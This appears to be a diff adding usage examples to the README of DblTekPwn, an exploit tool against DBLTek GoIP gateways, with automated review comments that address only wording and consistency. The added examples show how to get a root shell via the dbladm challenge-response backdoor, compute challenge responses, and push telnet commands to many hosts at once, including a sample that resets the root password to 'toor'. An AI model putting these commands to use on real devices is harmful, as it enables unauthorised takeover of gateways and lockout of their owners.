@@ -69,11 +69,51 @@ USAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]
6969
7070## Examples
7171
72+ ### Getting a Root Shell on a Vulnerable System
73+
74+ DblTekGoIPPwn makes it easy to simply get a root shell on any vulnerable system. Simply run the
75+ following command using the vulnerable IP.
76+
77+ ```
78+ DblTekPwn.exe --root-shell --name 192.168.1.1
79+ ```
80+
81+ You will see output that looks like this:
82+ ```
83+ Trying 192.168.1.1...
84+ Connected to 192.168.1.1.
85+ Escape character is '^]'.
86+
87+
88+ Start login
89+ do exec: /sbin/login
90+ Login: dbladm
91+ challenge: N1746203308
92+ Password: ***********
93+
94+ ```
95+
96+ From here you can simply begin entering commands.
97+
98+ ### Calculating a Challenge Response
99+
100+ Say you simply wanted to calculate the response to a GoIP challenge ``` N1746203308 ``` . Simply
101+ run the following command.
102+
103+ ```
104+ DblTekPwn --compute-response N1746203308
105+ ```
106+
107+ The output will be the response:
108+ ```
109+ d6176d3aab2
110+ ```
111+
72112### Checking a List of IPs
73113
74- Say you wished to check ``` list.txt ``` of IPs for GoIPs that are vulnerable, and send this output
114+ Say you wished to check ``` list.txt ``` of IPs for GoIPs that are vulnerable and send this output
75115to ``` results.txt ``` . First make sure that the IPs are in format ``` ip:port ``` (port is default 23)
76- and that the IPs are seperated by a newline ``` \n ``` . The following command could then ran.
116+ and that the IPs are seperated by a newline ``` \n ``` . The following command could then be ran.
77117
78118```
79119DblTekPwn.exe --test --file list.txt --output results.txt
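Review bot: The added examples name the tool three different ways: the prose at new line 74 says `DblTekGoIPPwn`, the commands at new lines 78 and 119 invoke `DblTekPwn.exe`, and the command at new line 104 invokes `DblTekPwn` with no extension, while the USAGE line in the hunk header reads `DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]`. Pick one name and use it throughout. The root-shell example passes its host with `--name` where the list example uses `--file`; a sentence stating what `--name` accepts (for instance, whether the `ip:port` form is allowed) would make it consistent with the paragraph at new lines 114-116. In that reworded paragraph, "could then be ran" should be "could then be run", and "seperated" is still misspelled. The sample output fences at new lines 82 and 108 also open directly after the sentence with no blank line, unlike the other fences in this file.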
@@ -97,5 +137,46 @@ results.txt:
97137192.168.1.4:2323 False
98138```
99139
140+ The ``` False ``` or ``` True ``` after the host indicates whether or not the IP is vulnerable.
141+
100142### Sending Commands to a List of IPs
101143
144+ Say you had a list of commands (which is really a list of telnet inputs) in ``` cmds.txt ```
145+ to send to ``` list.txt ``` of IPs and send the output to ``` results.txt ``` . First make sure
146+ that the IPs are in format ``` ip:port ``` (port is default 23) and that BOTH the IPs AND commands
147+ are seperated by a newline ``` \n ``` in their respective files. The following command could then
148+ be ran.
149+
150+ ```
151+ DblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt
152+ ```
153+
154+ list.txt:
155+ ```
156+ 192.168.1.0
157+ 192.168.1.1
158+ 192.168.1.2:1337
159+ 192.168.1.3
160+ 192.168.1.4:2323
161+ ```
162+
163+ cmds.txt:
164+ ```
165+ passwd root
166+ toor
167+ toor
168+
169+ exit
170+ ```
171+
172+ results.txt:
173+ ```
174+ 192.168.1.0 False
175+ 192.168.1.1 True
176+ 192.168.1.2:1337 True
177+ 192.168.1.3 False
178+ 192.168.1.4:2323 False
179+ ```
180+
181+ The ``` False ``` or ``` True ``` after the host indicates whether or not the connection was successfully
182+ made and the commands delivered.
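Review bot: The sample `results.txt` at new lines 174-178 uses the same `host True|False` layout as the `--test` output shown in the context lines above, but the two closing sentences give the flag different meanings: at new line 140 it means the IP is vulnerable, and at new lines 181-182 it means the connection was made and the commands delivered. Someone holding only a `results.txt` cannot tell which one they are reading, so consider a header line or distinct labels per mode. The `cmds.txt` sample also contains an empty line at new line 168, and the text does not say whether it is sent as an empty telnet input or skipped; since the paragraph says commands are newline-separated, that behaviour should be stated. The sample changes the root password on every listed host, so the README should say that the command file is sent as-is with no confirmation step, if that is the case. "seperated" (new line 147) and "be ran" (new line 148) should read "separated" and "be run".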